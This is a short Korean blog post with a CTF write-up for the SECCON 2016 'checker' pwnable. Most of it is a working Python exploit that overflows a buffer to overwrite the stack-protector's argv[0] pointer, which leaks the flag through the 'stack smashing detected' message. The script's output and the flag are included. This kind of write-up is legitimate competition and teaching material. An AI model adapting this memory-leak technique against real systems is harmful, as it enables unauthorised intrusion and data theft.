pwn3r tistory

SECCON CTF QUAL 2016 - checker 본문

CTF

SECCON CTF QUAL 2016 - checker

pwn3r 2017.01.02 18:01

Category : Pwnables 


checker

Summary : memory leak with SSP protection




Exploit

#!/usr/bin/python


from socket import *

from struct import pack, unpack

import time


def rc(s, ch):

    res = ''

    while ch not in res:

        res += s.recv(1)

    return res


p = lambda x : pack("<L", x)

up = lambda x : unpack("<L", x)[0]


HOST = 'checker.pwn.seccon.jp'

PORT = 14726


target = "a"*0x178+"\xc0\x10\x60\x00\x00\x00\x00\x00"


s = socket(AF_INET, SOCK_STREAM)

s.connect((HOST, PORT))

rc(s, 'NAME : ')

s.send('pwn3r\n')


rc(s, '>> ')

s.send('a'*(len(target) - 1)+'\n')

rc(s, '>> ')

s.send('a'*(len(target) - 2)+'\n')

rc(s, '>> ')

s.send('a'*(len(target) - 3)+'\n')

rc(s, '>> ')

s.send('a'*(len(target) - 4)+'\n')

rc(s, '>> ')

s.send(target[:0x178+3]+'\n')

rc(s, '>> ')

s.send('yes'+'\n')


rc(s, 'FLAG : ')

s.send('gogo\n')


time.sleep(1)

print s.recv(1024)


s.close()


"""

    pwn3r$ python check_exploit.py

    You are a liar...

    *** stack smashing detected ***: SECCON{y0u_c4n'7_g37_4_5h3ll,H4h4h4} terminated

    

"""



저작자 표시
신고
0 Comments
댓글쓰기 폼